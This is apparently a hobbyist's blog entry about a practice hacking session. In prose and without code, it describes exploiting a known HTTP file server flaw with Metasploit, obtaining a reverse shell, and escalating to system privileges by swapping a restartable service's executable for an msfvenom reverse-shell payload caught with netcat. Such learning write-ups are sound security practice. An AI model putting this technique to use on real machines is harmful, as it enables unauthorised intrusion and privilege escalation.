Today was a lot of fun. After almost a week of not being able to do much hacking, I was able to get down and dirty with some Windows manipulation. Luckily, today involved both meterpreter, and the old fashioned way of executing a script.
Since I’m still learning the intricate ins and outs of meterpreter, it was good to go through some of the same routines for capturing a Windows machine. The capture today was due to a flaw in an HTTP file server. It was a known flaw that had an assigned exploit database number. This meant that I could simply google the version number of the server, and have the code for the script pop up.
To play around with meterpreter, I decided to download the script and have it ready, but also did a meterpreter search for the particular software. Needless to say, it turned up pretty quickly… but this wasn’t my real goal; I wanted to play around with Power Shell after I pwnd the box, and see if I could get privilege escalation.
Using meterpreter, the reverse shell was pretty easy to get. After putting in the standard options for the target IP and port, I just typed ‘exploit’ and watched the magic happen. It took about three attempts before it worked, but that’s becoming more and more common in the hacking that I’m doing. The key there is to never give up!
Once I had a meterpreter shell, I had to google how to turn that into Power Shell, but it was fairly easy. The PS prompt showed up, and I could start playing around with the various commands to enumerate the situation.
One of the services on the box was able to restart via a regular user, so this meant that I could stop the service, replace the executable with one that I had made, and then restart the service once again. If the service was running as system when I restart it, that would mean that I would have root privileges in a shell. So I did a command using ‘msfvenom’ and compiled an executable with a reverse shell payload. After uploading it to the box, and replacing the service’s executable with the payload file, I went ahead and restarted the service using the power shell.
With a netcat listener started up, I received the reverse shell right away as soon as the service was restarted. This came with root privileges, and ultimate freedom to do whatever I wanted.
After finishing the hack with meterpreter, I wanted to go back and do the same hack using the script found on the exploit database site. This was pretty simple and simply involved putting in my IP address for callback, and setting up another netcat listener.
Overall, the hacks were fun, and I was able to learn a lot more than I anticipated. I’ve been concentrating on Windows for the last couple of weeks, so it’s starting to become pretty straight forward… this sounds like a win to me!